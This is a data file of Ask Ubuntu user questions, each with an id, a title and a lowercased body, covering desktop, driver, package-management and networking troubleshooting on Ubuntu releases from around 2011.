64986	using your laptop as loudspeaker for your mobile	i 'm thinking on how to use my laptop running ubuntu ( with its loudspeakers ) as `` headset '' for my android mobile . for instance : i listen to some music on my mobile and i want to connect my laptop as a headset ! is sounds weird maybe but i guess somebody came up with the same idea ! obviously it deals with bluetooth , how can i display and in case modify the bluetooth services available on ubuntu ?
64990	`` error : no peer certificate '' in ubuntu one android app	downloading and ( automatic ) uploading in the ubuntu one android app stopped working all of a sudden . the upload of other files also does n't seem to work . it keeps saying : `` error : no peer certificate '' . logging in and seeing filelists works fine . i use an android 2.3 phone . tried rebooting , reinstalling the app and logging out and in of the app . what should i do ?
64991	looking for a cheap laser mono printer ( for home usage ) that works perfectly ?	nothing much to add to the title ... for `` perfectly '' i mean : no proprietary driver install ( works out of the box ) full featured driver : duplex printing ( if supported by the printer ) , adjustable printing quality , printer maintenance routines , etc ... and it has to be cheap , because i 'll use it just to occasionally print a bunch of text documents , at low quality , and printing on both sides . can you help me ?
64995	what is the difference between shutdown and poweroff commands ?	i 've a home server i 'm playing around with : ) i want to learn server administration ... i have hard time understanding difference between shutdown -h now and poweroff -h now my logic tells me it 's the same thing ... but with shutdown , linux halts , and power stays on - i can see all lights up and cooler rotating . strange , only way to turn off my box completely is to use poweroff -h any clarification will be appreciated .
64996	/var/log/apache2 gets deleted on restart - so apache does n't start on startup	i need help . every time i restart apache log directory gets deleted . so after each reboot , i 've to mkdir /var/log/apache2 any ideas how to solve this issue ? i 've a hunch it 's permissions problem , but hey ... you know more than me : )
64997	error message : e could not get lock /var/lib/dpkg/lock - open ( 11 resource temporarily unavailable )	i 've been getting this exact error message since i installed ubuntu 11.04 natty narwhal 64-bit on 10/09 . i have n't installed any updates , so it ca n't be that , since its the first thing that pops up . what i 've tried : my ubuntu 11.04 ( oct 9th , 64-bit ) fresh install sends me this message when i try to execute the following commands sudo rm /var/lib/dpkg/lock sudo rm /var/cache/apt/archives/lock message : rm : can not remove '/var/lib/dpkg/lock ' : no such file or directory here is what happens one minute after i installed ubuntu ( regluar-not lts version ) via the iso file downloaded directly from ubuntu.com . ( i try to install vlc media player , after attempting to install ubuntu restricted extras ) . here 's what it says : ( updates not installed yet at this point ) '' an handleable error occurred '' there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . now , i have tried to check to see if there is a vital program holding the lock , but i 'm a linux newbie . everything says that it 's dormant , so what 's holding the lock ? ( i 've also tried to update the kernel version , but that has never worked . ) please , if there is someone out there that knows what they are talking about , help me .
65001	how to connect wirelessly in a cafe with 11.04	wireless works fine at home . however , at a cafe i am not able to browse internet or ping 72.14.204.105 . i am able to connect wirelessly at cafe and ping router : 192.168.1.1 . route includes : default 192.168.1.1 . 0.0.0.0 . ug 100 0 0 wlan0 i am not using firewall . using dhcp . no wireless security . how do i fix this ? thanks .
65004	will pygobject for python 3 be included in 11.10 ?	will pygobject of python 3 be included with ubuntu 11.10 ? i am interested in using the new features provided with gtk3 with python 3 but i have been unable due to the complexity involved with getting pygobject setup with python 3 . and since python 3.2 is included by default ( that 's what i 've heard anyways ) , now would be the perfect time to include pygobject for it as well .
65007	autoproxy 's auto mode does n't work	i do n't if this is the right place to ask this question , so please let me know if i can get better answer elsewhere . i just moved to ubuntu 11.04 from windows vista . i 've been using firefox autoproxy + ssh for quite a while in vista and it 's working perfectly . but in ubuntu the auto mode of autoproxy actually become the global mode , which use the ssh proxy for every site i go to and this is significantly slowing down my surfing speed . and the global mode is still works asglobal mode . i 've no idea why this is happening . so can anyone give me a hint ? thanks in advance .
65009	how do i change the default application for unknown file types ?	ever since installing bless hex editor , all unknown files and text files automatically open with bless instead of gedit . how do i change it back ? i do n't want to have to manually associate files with gedit , i just want gedit to be the default if there 's no other application set up to open the file . solution : modify ~/.local/share/applications/mimeapps.list [ default applications ] - text/plain=bless.desktop - application/octet-stream=bless.desktop + application/octet-stream=gedit.desktop
65010	does lubuntu use all the latest drivers etcetera ?	i have a fast machine - let 's say intel core i7 , ssd drive , nvidia gtx 560 card . i do n't need an eye-candy system . i still need to perform it properly , that meaning have latest drivers , use my hardware properly . i think it 's strange to say : well , this pc is so fast , let 's install gnome3 on it , it will handle , so whatever . why would n't i install lubuntu on it , just as i use it on my net-book ? in other words is lubuntu a good choice or not ? i mean , does lubuntu have any disadvantages to it when it comes to new hardware support , or whatever ? note : this may look like an off-topic question leading only to a discussion , but bear with me for a second here . i do n't mean to discuss which of the two is better or whatever , i 'd rather hear facts .
65017	change/edit non-expanded gnome-panel handles	i set my gnome-panel to behave like a wingpanel ( floating panel at the right top corner of the screen ) : i edited the background to match the window titlebar background , but those handles ( the two black points on the edges of the panel ) are annoying me , i know it 's impossible to remove them , but i want to know where is their image ( png , jpg , whatever ) , because i know it can be changed/edited as each theme has it 's own handle . i already looked for it over all the /usr/share/theme folder , only one theme had the handles image in it 's folder , others do n't , i made several searches for anything related , but i got anything . please , mainly those who creates themes , help me . it 's not in the /usr/share/theme or icon directories neither in the ~./.theme/ directory . note : i 'm using ubuntu 9.10 , but any information of users of 10.04 and 10.10 are useful .
65019	find links in pdf	i need to find all links in a pdf file , but also their position x , y on those pages . i want to create pictures out of a pdf ( that i know hw to do ) which i will use on a web site , but i need to know about those links too . what ever you can give , i will be very thankful .
65020	how to use apt-get install with suggested packages ?	i read this related link installing suggested/recommended packages ? but my system ( 11.10 ) does n't install suggested packages by default . was there a change ?
65022	what 's the keyboard shortcut to switch to right-to-left text layout in textbox ?	sometimes , i did n't remember what keys had i pressed , occasionally switched a text box to right-to-left layout . well , maybe this is a very useful feature for arabic users , but i just do n't know how to switch back to left-to-right layout . ( p.s . in ms windows , there 's a text direction option in the right button menu for the text box . however , in linux ( gnome classic ) i did n't see any . )
65023	are there any ubuntu-based equivalents of corel draw , pagemaker , photoshop and quark express	are there any ubuntu based application for the below listed softwares . corel draw - latest version pagemaker - latest version photoshop - latest version quark express - latest version
65030	how do i enlarge `` icon & thumbnail '' size in nautilus 3.x ?	i used to be able to set my icon/thumbnail size to 128 px using gconf-editor in previous versions of ubuntu . is there a tweak to enable larger icons/thumbnails in nautilus 3.x ?
65035	sun-java-6 incorrect classpath/java.home problems in finding tools.jar	i installed sun-java6-jdk and sun-java6-jre ( and likely other related java6 packages such as fonts ) for a project running on a ubuntu 11.04 server distribution . our project programmatically calls javadoc from within our running executable . to do so , we obviously need to know the location of the tools.jar file which is part of the jdk distribution , but not the jre distribution . the packages were installed into /usr/lib/jvm/java-6-sun-1.6.0.26/ and there are bin and other directories under the two areas ( jdk/jre ) which provide the various standard binaries . whenever we execute a java program ( via the java binary ) , the internal java.home variable seems to overwrite any java_home environment variable provided . we have concluded that the binary thus derives its java.home from the path of the binary . the java binary under the jdk really is a link to the jre version . thus , no matter which one you 'execute ' , you are always getting the jre version , and thus the java.home directory is defined to be /usr/lib/jvm/java-6-sun-1.6.0.26/jre . as such , any running executable can not seem to find the tools.jar file , and even passing the -cp /usr/lib/jvm/java-6-sun-1.6.0.26/jdk/lib/tools.jar option does not help . we 're hoping that someone can help shed some light on how we can correctly access the tools.jar file enabling us to correctly be able to call the com.sun.tools.javadoc.main.execute method . example execution : java -cp /usr/lib/jvm/java-6-sun/lib/tools.jar -jar comtor.jar -sourcepath . exception in thread `` main '' java.lang.noclassdeffounderror : com/sun/tools/javadoc/main at comtor.comtor.main ( unknown source ) caused by : java.lang.classnotfoundexception : com.sun.tools.javadoc.main at java.net.urlclassloader $ 1.run ( urlclassloader.java:202 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:190 ) at java.lang.classloader.loadclass ( classloader.java:306 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:301 ) at java.lang.classloader.loadclass ( classloader.java:247 ) ... 1 more
65036	dell vostron hangs/freezes randomly after ac power or wifi swtiched off	i am running natty narwhal on a dell vostro ( i do n't know the model number ) . the machine will hang ( freeze ) hard a random time ( 0-5 minutes ) after i either remove the ac power cable or disable wifi using the switch at the front of the machine . here are some details : hard freeze means even the mouse cursor does n't move . i ca n't switch virtual terminals using `` ctrl+alt fn '' . i have not tried to ssh in from another machine , or using a serial console . this is independent of the graphics driver ( it 's an nvidia card ) it 's a broadcom card , but i have not tried the proprietary drivers ( wifi works ) if both ac power and wifi are on , but i switch off the wifi , it will soon hang . if i boot up without the ac power , it will hang within a few minutes of boot if i boot up with the wifi switched off , it will not hang , unless i pull out the ac power . the frustrating thing is that last week i googled around and found someone with very similar problems ( and they had a solution ) but now i ca n't find it again . this person claimed that his machine also did n't crash if he plugged in an ethernet cable , and then unplagged the ac power . i have not tested this . after pulling out the ac power , there is no change to the outputs of lspci -nnvv , lsmod , or iwconfig . unless someone asks , i will not pollute this site with the complete output of all these commands ; here is a selection : iwconfig ( full output ) : lo no wireless extensions . eth0 no wireless extensions . vboxnet0 no wireless extensions . virbr0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lspci -nnvv ( only the broadcom secton ) 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : dell device [ 1028:0010 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at fb400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : brcm80211 kernel modules : brcm80211 lsmod | grep 211 brcm80211 748941 0 mac80211 294370 1 brcm80211 cfg80211 178528 2 brcm80211 , mac80211
65037	my fresh windows installation came with four pre-installed partitions . how can i dual-boot ubuntu and windows ?	when i view my disk space in windows , it just looks like i have one big drive for all the usual stuff , plus a second little guy for recovery files . however , the ubuntu installation and gparted reveal this : why are there so many partitions ? do you really need all of those , windows ? `` system '' and `` recovery '' do n't sound like things i want to delete , and i googled hp tools and it sounds like it has something to do with bios . i considered creating a set of recovery disks and deleting the recovery partition , but i ca n't find the option to do this -- whenever i go to the menu where the internet tells me i should find the option to create recovery disks , it is n't there ! even if i did do this , i 'd only have one free partition , and i 'd have to reformat the entire thing as an extended partition just to run ubuntu -- would that even work ? or would windows and ubuntu be upset having to share an extended partition ? i 'm feeling a bit down , i was rather looking forward to installing ubuntu ... : c
65040	setting up vpn connection : only pbk file ( windows ) available	i want to set up a connection with the network of my work via vpn in ubuntu ( 11.04 ) , but they only provide support for windows . they provide a pbk file , and in windows you just have to double click it to make the connection . can i use this in a certain way in ubuntu ? i know that the pbk file is a text file i can open to extract maybe useful information , but i do n't know what . for example , when i add a vpn connection , do i have to choose for vpnc or pptp ? i do also know that there is a similar question - running a pbk file in linux - but that has migrated to another site , and there they do n't give really a satisfying answer .
65041	how to run synaptic with sudo privileges ?	how to launch a program with sudo privilege in unity ? i am using ubuntu 11.04 . i used this command but it does n't really work : sudo synaptic
65043	no access to 3rd and 4th levels on macbook with danish kb layout	my danish keyboard layout is not supported in ubuntu , here 's the layout available danish layouts on ubuntu exclude the traditional mac function key . as a result i cant get to the 3rd and 4th levels of any key some are generally useful like the ' @ ' symbol
65045	how to set password on initial boot of pre-installed ubuntu	we are looking at providing laptops that pre-installed with ubuntu and need a way to force the user to set a password during the first bootup . is there a standard way to do this ?
65048	will the new version be using the improved unity shell or gnome3 ?	will the new version be using the improved unity shell or gnome3 ? if it 's using unity , can i still install gnome3 on it ? ? ?
65049	ca n't launch ubuntu ( or any linux ) on hi-end hardware ?	there a though one : i 've bough a new computer with the following configuration : asus rampage iii extreme core i7 950 zotac amp ! geforce gtx 560 kingston khx1600c9d3k3 3x4gb haf 922 ocz fatal1ty 750w seagate 500gb st3500413as after installation of any linux i ca n't lauch it ! after grub screen , when it 's supposed to launch system it gets stuck with black-screen ( debian ) or purple-sceen ( ubuntu ) . i installed various versions of ubuntu , debian with and without x , fedora . every time it 's the same : total freeze after grub . can anyone help me , please ? i do n't want to stuck with windows ( which is running perfectly as never ) !
65054	unity launcher api for c++	i am trying to develop some program in qt with qt sdk . yesterday i was reading about unity launcher api on official ubuntu website . but there is example only for vala and python . is possible to use unity launcher api ( quicklists , counters , and progress bars ) with c++ language and if it 's possible , please post an example .
65057	gthumb for file browsing	ubuntu 11.10 enforces gthumb for even normal non-image file browsing . gthumb might be a good image browser but its a pathetic file browser ( compared to nautilus ) can we get nautilus back in 11.10 ?
65058	eclipse 's executable file wo n't run in ubuntu	i just downloaded the eclipse package from the eclipse website in zipped format . i unzipped it in my user directory and set 777 permissions , but double clicking the eclipse executable wo n't do anything . i tried running the executable file through terminal , but it shows the error : bash : ./eclipse : no such file or directory then i installed eclipse through ubuntu software center , which runs successfully . just the downloaded version does n't run . i have installed openjdk in ubuntu 10.10 . can anyone please tell what is wrong with my eclipse ?
65059	how to embed on-screen keyboard into gnome-screensaver 3.x unlock screen ?	the gconf value /apps/gnome-screensaver/embedded_keyboard_enable in oneiric no longer works obviously . is there a way to show virtual keyboard in gnome-screensaver 3.x ? does similar dconf value exist ? it makes unlocking the screen without the keyboard on tablets impossible .
65062	how do i add an alternative `` open with '' command for text files in kubuntu ?	on kubuntu 11.04 i just installed gvim , which magically added an `` open with gvim '' for a bunch of text files . great , but i would like to add another one in order to start gvim on the given file and change current working directory to the file location : gvim -f % f -c `` cd % d '' the command above works fine , but i have no idea how to make another `` open with '' to use the command . i do n't want to make this the default , just an option . the file manager i 'm using is dolphin , if that matters .
65069	is it possible to keep gnome 2 in 11.10 ?	unity has been both praised and hated by different people for various reasons . mark shuttleworth for example says that it 's designed for widescreens as an example . i do fully agree with that statement , however due to the fact that i do not have a widescreen ( 1280x1024 ) unity simply does n't function smoothly for me . that 's what it 's important for me to have a good alternative . since i really loved gnome 2 , i 'd like to ask if it 's possible to keep using that in ubuntu 11.10 or would you guys suggest another alternative and if so why ?
65073	missing linux/autoconf.h	i 'm trying to compile a package in ubuntu but getting error '' linux/autoconf.h : no such file or directory '' now i see that the missing file is under /usr/src/linux-headers-2.6.38-11-generic/include/generated '' . where do i have to copy this file in order for the program to compile ? i 'm new to linux so please be specific if possible . update : ok making progress . i think i have to copy the autoconf.h to a default location where the linux kernel can find it . i 'm using ubuntu 11.04 . this is how my /usr/src folder looks like : linux-headers-2.6.38-11-generic linux-headers-2.6.38-generic linux-headers-2.6.38-11 linux-headers-2.6.38-8 nvidia-current-270.41.06 anyone know where i should copy the autoconf.h file ?
65078	how to use empathy in kde ?	i have installed empathy on kubuntu and when i try to add my account it says that it cant communicate with the gnome keyring well thats because i do n't have gnome but kde so is there a way to use empathy in kde or is there an equivalent for kde which will allow me to chat with my friends on facebook ?
65079	just installed a cli system then ubuntu-desktop , does not boot automatically	i installed a cli system with ubuntu 11.10 beta 2 alternate cd . then installed ubuntu desktop ( -- no-install-recommends ) . after a restart , it hangs at the below screen whats wrong ? btw : i notice a cli system will not boot in by default ( even in 11.04 ) , i must go recovery mode and update grub then resume boot . this happens even when there are grub entries for the oses already ( though i am not sure if they are invalid or something ) . another method is setting nomodeset update i used edited the boot entry to include text nomodeset . then i got a full log with 1 fail maybe i missed a package since i installed ubuntu desktop with no-install-recommends update 2 : with ubuntu 11.10 stable i just installed ubuntu 11.10 stable ( cli system ) then installed ubuntu-desktop -- no-install-recommends . startx to boot into ubuntu desktop ok. but reboot and got stuck on the above screen tried : boot into recovery , update grub , resume got : tried booting into ubuntu 11.10 but with text nomodeset in grub got similar as above
65081	implications of -- no-install-recommends ( apt-get install )	when i install packages using -- no-install-recommends , can i say only packages listed here ( ubuntu package search ) as `` depends '' are installed ? i ask because i suspect some problems with boot might be because some packages are not installed ? some time back , i also had problems with wireless drivers and seemed to be missing
65083	what kinds of desktop environments and shells are available ?	this question exists as it fills a specific criterion . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will likely be closed per the faq . more information on the software-recommendation tag . what kinds of desktop environments or shells are there for ubuntu users to install ? please list one desktop environment or shell per post with : a description on why you like or suggest it ( features , performance , etc . ) , a good screenshot , preferably of it running on ubuntu and showing off some of its features , the minimal requirements required for it to be usable , if there is any setting to lower it 's requirements ( like kde 's low-fat profile ) , please mention how to enable said setting some instructions on how to set it up , if in the repositories , please provide a software centre link currently most popular : gnome shell
65085	keyboard play/stop/next/prev buttons does not work with spotify	i 'm running the spotify linux beta . my keyboard is a logitech illuminated something wired keyboard . my keyboard hotkeys work with banshee , but not with spotify , even though controlling spotify via the `` volume '' widget in the top right of the upper panel works fine .
65088	dual boot ubuntu and windows 7	i am planning to install ubuntu along with win7 on my system . i have 2 different drives c : and e : . e : drive is created after shrinking the windows c : partition . can i use my e drive for installing ubuntu ? also is there any guide to step by step installation of ubuntu along with windows .
65096	how to `` clean '' previous kernels after update ?	i know this topic was brought up many times but i did n't really found an answer that would satisfy me . namely : i have just updated the kernel version ( to 2.6.38-11 ) and i still have some `` leftovers '' from the previous version . that 's the content of the /boot folder abi-2.6.38-10-generic abi-2.6.38-11-generic config-2.6.38-10-generic config-2.6.38-11-generic grub initrd.img-2.6.38-10-generic initrd.img-2.6.38-11-generic memtest86+.bin memtest86+_multiboot.bin system.map-2.6.38-10-generic system.map-2.6.38-11-generic vmcoreinfo-2.6.38-10-generic vmcoreinfo-2.6.38-11-generic vmlinuz-2.6.38-10-generic vmlinuz-2.6.38-11-generic i want to clean all the stuff that should n't be on my computer anymore as the new version of kernel works just fine . i was trying to clean it up with use synaptic but i get this : edit : when i for instance update grub i still get this even with removed dependencies : $ sudo update-grub2 generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.38-11-generic found initrd image : /boot/initrd.img-2.6.38-11-generic found linux image : /boot/vmlinuz-2.6.38-10-generic found initrd image : /boot/initrd.img-2.6.38-10-generic found memtest86+ image : /boot/memtest86+.bin found windows recovery environment ( loader ) on /dev/sda1 found windows 7 ( loader ) on /dev/sda2 done i want to get rid of these images .
65099	clementine has high cpu usage even after shutting it down	i have an issue with clementine : sometimes ( even after switching it off ) it takes up a lot of cpu like on the screen here on the screen there are visible 2 instances of clementine but both of them are already switched off . anyone also having this problem ? if this matters i have the music files on ntfs partition which i mount every time i boot the system ( maybe it does some indexing or things like that ) . btw : can i make ubuntu mount this partition automatically ?
65101	what are these files like zone.identifier : $ data and how to prevent them ?	i have an ext4 drive which is available to my windows xp virtualbox as a shared folder . when working with files across ubuntu and windows i sometimes see these autogenerated files with zone.identifier : $ data appended to the name . for example , if i have the file scite-2.29.msi then i will get a small annoying file like scite-2.29.msi : zone.identifier : $ data the contents of the file : [ zonetransfer ] zoneid=3 they seem to be created any time i write a file to the ext4 drive from within my windows virtual machine . i seem to be able to safely delete them without any obvious consequences . what are these files for , and if they 're useless how can i prevent them from being generated in the first place ?
65102	blank screen after installing on a dell inspiron n4030	i have dell inspiron n4030 and i installed ubuntu 10.10 desktop edition onto it . but for some reason or another it will not boot into the gui , i have installed and reinstalled ubuntu and ubuntu netbook times over , but still with no luck . the livecd is perfectly fine , but once i reboot its all in text-mode . i tried doing 'startx ' but it just made the screen go blank . i do n't know how , but at one point i was holding down the power button to turn it off after doing 'startx ' . i also tried nomodeset . but then it just shutdown cause i was holding down the power button . does anybody know how i could get the gui to load on boot ? thanks for all your help ! if i installed higher version of ubuntu say ubuntu 11.04 is their going to be same problem . also i read it some where that problem is video driver please suggest solution
65109	how to cut and paste from remote desktop viewer	i use rdesktop to access a windows xp box at work , and i use `` remote desktop viewer '' to access a mac os x box with vnc . cut and paste works ok from rdesktop , although occasionally i have to kill and restart the rdpclip.exe program on the windows box to unstick it . but how do i cut and paste between the remote desktop viewer session and the host ?
65112	get ubuntu anywhere ?	i want to be able to remote to my ubuntu desktop from anywhere , but securely . windows , of course , has all kinds of free programs that i can use , such as logmein.com & pocket cloud . what is the best , most secure way to do this for my ubuntu desktop & how can i do it without needing a static ip address ?
65114	what is the best way to stop other users accessing my data , while still allowing them in my public folder ?	i only know of two ways to do this , , encryption and chomd and have some questions about those , as well as if there are any other ways . i want any given user have their data protected from any other user unless an administrator password is given . i would also like anyone , without authentication , to be able to view a public folder . is it possible to encrypt a home folder while still allowing the public folder to be accessed ? if not , is it possible to chomd the home folder so it 's contents can not be read ( files ) but navigation to the public folder is still possible ?
65120	wireless connection not recognized after trying to set up xl2tpd or pppoeconf	to be able to use some vpn , i installed the xl2tpd on ubuntu , but it did not work and i removed it . i changed a bunch of configuration files during the process . i used this tutorial : http : //markusthielmann.com/blog/hotspot_shield_ubuntu my modem configuration is set to bridging mode . so i also used pppoeconf to configure my broadband connections . and after restarting my system i ca n't see the connections icon on the top bar . wireless networks are not recognized and listed . what can i do to identify and solve the problem ? when i right-click on the connections icon on the top and select `` edit connections ... '' in the wireless tab i can see the connection but when i click the connections icon under `` wireless networks '' it says `` device unmanaged '' . previously it listed the available networks there . the output of sudo lshw -class network is : *-network description : ethernet interface product : 191 gigabit ethernet adapter vendor : silicon integrated systems [ sis ] physical id : 4 bus info : pci @ 0000:00:04.0 logical name : eth0 version : 02 serial : 40:61:86:18 : d7 : ac size : 100mb/s capacity : 100mb/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sis190 driverversion=1.3 duplex=full ip=192.168.2.4 latency=0 link=yes multicast=yes port=mii speed=100mb/s resources : irq:19 memory : fddfcc00-fddfcc7f ioport : cc00 ( size=128 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 1c:4b : d6:5b:1b:5e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : fdff0000-fdffffff
65123	any new keyboard shortcuts in 11.10 ?	i have just installed the new version of ubuntu 11.10 , called `` oneiric ocelot '' , but i dont see any new shortcuts to help improvement between desktops and applications . i have try alt+tab , control+alt+arrows , super + space is there any new and useful shortcuts ?
65129	switch between two nvidia-settings metamodes from commandline	ubuntu 10.04 with nvidia restricted drivers running nvidia 9600 gt with dual dvi monitors ( 22 '' and 23 '' ) . in the default metamode ( 1 ) , both monitors are active . i 've added a second metamode via nvidia-settings ( version 1.0 ) in which only the 23 '' monitor is enabled . i can switch between metamodes using the nvidia-settings gui . is there a way to do this from the command line ? i 've read about disper on this site but have not tried it as i hoped this functionality was available via nvidia-settings ? i can find nothing helpful in the man page though . edit : after switching between the two metamodes in nvidia-settings gui , i noticed a line in the gui reading `` switched to metamode axb . `` , where a and b specified the new resolution . so switching metamodes is simply a resolution change ? i 've read elsewhere that what i want to do can be achieved with xrandr . would this be correct , because it seems all i need to do is change the resolution ? in metamode 1 , the resolution is 3600x1080 ; in metamode 2 it 's 1920x1080 .
65132	how does one view system changes comparing before and after an application installation ?	i would like to see a diff . of my ubuntu system - including all new directories , files , and file changes - comparing the state before vs. after an application installation . how would i do that ? thanks .
65137	starting opera after suspend leads to a failure message	when starting opera after resuming from suspend i get the following message : when restarting the computer i can start opera without any problem . any ideas how to solve the issue ?
65138	ubuntu one music store plugin not working in rhythmbox	why did canonical not update the ubuntu one music plugin for rhythmbox in 11.10 ? when in 11.10 it 's not even an option to install it like in 11.04 .
65146	how to convert a mp4 video to mpeg-1 layer 1 ?	i need to convert a video to mpeg-1 layer 1 to make some tests with the software i 'm developing . how can i do this conversion ?
65149	is there anything better than gnome-session-fallback aka classic gnome ?	i upgraded today to find the following desktop options : unity ( 2d/3d ) : it 's hard to describe how much i dislike unity without breaking various codes of conduct , so i 'll leave it as : do not want . it 's also crashtastic at the moment but that 's another story . classic gnome ( as installed from gnome-session-fallback ) : this is basically a massive hack . panels are n't configurable , fonts are all borked , incompatible with the main themes , does n't support dual-head . a broken gnome shell . i installed gnome-shell and re-logged-in but it looks awfully like the already broken gnome classic , nothing like the fairly beautiful screenshots of a stock gnome shell install . what i 'm used to and am looking for is something very much like what i 've always used including amazing features like : being able to have one panel , on the bottom a window-list in that panel ( where i can see both the application 's icon and the window title ) ideally multi-screen support so i can have a panel for each screen a launcher in the left hand side ( i 've been using cardapio for a while ) a system tray of some variety with a clock think windows xp , kde or mint . these are n't fresh ideas but i 'm not looking to change my entire desktop experience right now . for that reason , i 'd also prefer to stay with something based around gnome . i use a lot of gvfs stuff and live in gedit so i 'd rather not move to kde . so short of reinstalling natty , what are my options ? edit : you can customise gnome-session-fallback 's panels ! while this does n't fix everything for me ( it 's still ugly as sin at the moment and cardapio is n't here ) , you can edit the panels . depending on how you have things configured , in order to get the menus of panel applets ( and the context menus of the panels themselves ) you need to hold alt and super ( aka windows- or meta- key ) and then right click . i 'm hoping i can fix things enough to not ditch gnome completely but i 'd still like an answer to the original question . the further gnome moves toward gnome shell and canonical/ubuntu toward unity , the poor users in the middle of this tug of war will eventually need another option .
65151	remaster ubuntu to create livecd that has both unity and gnome shell	ubuntu 11.10 release is just round the corner , and for the first time , i need to remaster the original livecd as per my ( including most of the colleagues ) needs . i 'm totally new to remastering live isos and all i know is that i 've just `` heard '' about remastersys which can be used to do this . below are the things i 'll tweak with original iso . add gnome shell ( 3.2 ) as desktop environment choice , alongside shipped unity . ( most important ) install all restricted codecs for media playback . set default theme for gnome shell ( along with wallpapers , icons and gtk3 ) . include chrome and other similar apps with standard installation . install some handy gnome shell extensions . it should still be a livecd ( dvd in this case ) . i 'm not bothered about increased size of iso due to above bloat that i add . so , these are my needs , i can do all sorts of customizations but do n't know how to include that in iso , and that 's where remastering comes into the picture . so where should i start from ? note : i 'm not bound to use only remastersys , any other similar app will also do for me as long as it accomplishes above requirements .
65153	how to change a video resolution ?	can i change a video resolution ( say , from 640x480 to 320x240 ) ? -- update : at ubuntuforums there 's a thread talking about avidemux , i did a search in the wiki for `` resolution '' but i found nothing about how to change it . does any one already used it ?
65155	how to access my computer remotely ?	i certainly know of the remote desktop app in ubuntu but i have never really bothered with accessing my notebook remotely . can someone help me with a complete step by step guide to accessing my notebook remotely ? other recommended apps will also be greatly appreciated .
65156	anything better than webmin ?	is there any better web based administration tool than webmin ? or do you recommend learning setting up everything via ssh ? i know my way around terminal , but administering a box seems to complex of a task . is it worth putting time into learning webmin instead of pure terminal ? ( for the future ? ) i do n't want to be a sysadmin , but i 'd like to learn few things or two ... thanks .
65163	can you resize unity launcher ?	is it possible to resize the unity launcher in ubuntu 11.10 ?
65164	unity 3d not working no longer works after update	i 've been using oneric since the first beta version , and i 'm using it on my acer 5810tg laptop . recently , though i do n't know which day exactly , after performing routine updates from legit ppas , ubuntu started with unity 2d only . even if i pick `` ubuntu '' or `` user defined session '' on the login screen , unity-2d loads . i have built-in intel graphics which always worked fine with unity 3d , both on early versions of oneric and on natty . please suggest any possible reasons and/or ways to fix this .
65168	emacs 24 ca n't find ls	i installed emacs-snapshot through http : //emacs.naquadah.org/ everything works fine except when i run dired i get this error : debugger entered -- lisp error : ( file-error `` searching for program '' `` no such file or directory '' `` ls '' ) call-process ( `` ls '' nil nil nil `` -- dired '' )
65172	how do i decrypt a openpgp email ?	i recently installed quickly to develop an ubuntu application ( my first ) . i looked at the tutorial videos at developer.ubuntu.com . i followed all the steps and then ran quickly release at which point it asked me to create a openpgp key . so i created one and it took some time to get it uploaded to the ubuntu keyserver . now , i imported the key to launchpad . i got an email to my hotmail account which i need to decrypt . i have no idea how to do it . in the email , it provided a link showing the instructions but they were specific to an email client like thunderbird , evolution etc . so i forwarded the email to my gmail account which i have configured in thunderbird . i installed the enigmail plugin . but i still do not know how to decrypt the message . why ca n't this be a bit more simpler . i mean all the instructions up until this were clear and easy to follow but this one step is really annoying . please help . edit : i have thunderbird 7 and enigmail 1.3.2 installed . i do not see the option to automatically decrypt the email .
65175	any way of changing netbeans application font ?	i 'm running ubuntu and netbeans 7.0.1 and default fonts look like ... why , oh why it looks so hideous compared to windows , for example . is there any way of changing fonts that application is using by default ?
65176	what 's the time unit in /proc/lock_stat output	what is the time unit in the lock stat output from /proc/lock_stat ? microsecond or nanosecond ? class name con-bounces contentions waittime-min waittime-max waittime-total acq-bounces acquisitions holdtime-min holdtime-max holdtime-total -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - & ( & dentry- > d_lock ) - > rlock : 2917691 3323806 0.10 157427.70 2221545741.66 8786458 19485395 0.00 235.65 38647798.25
65179	udev run commands not running	i 'm trying to create a udev rule to unlock my computer when i connect my phone by usb . i could not find that that rule was being ran and so i tried a much simpler rule . this is the rule ( anonymized ) : kernel== '' sd ? 1 '' , attrs { idvendor } == '' **** '' , attrs { idproduct } == '' **** '' , symlink+= '' phone '' , run+= '' touch /home/user/udev.touch '' i know that the rule is running because the link phone - > sdc1 is being created but the file is not being created . are there security setting that i have to enable for the file to run an external program ?
65180	steps needed to troubleshoot a failed x-window startup	over the years i came accross situations where x fails to start , and usually resolves it by installing the os again . what would be the right way , google results in tons of different ways non of which really ever worked . what then would be common steps to check why x has failed to start ? i am looking for best practices to follow when troubleshooting something like this . thanks !
65184	the notify-send bubble looks ugly with openbox . ( yellow , black and non transparent )	system : ubuntu 11.04 server window manager : openbox the bubble looks like this : i want it to look like this : is there any way by just editing a config file ? ( which i , by the way , did n't found , neither in ~/.config nor somewhere else .. )
65191	how do i turn off passwords to log in and resume ?	when i turn on and waking asks for a password , then again , always twice . i want to turn off the passwords and not have to enter one at all when waking or turning on , please advise .
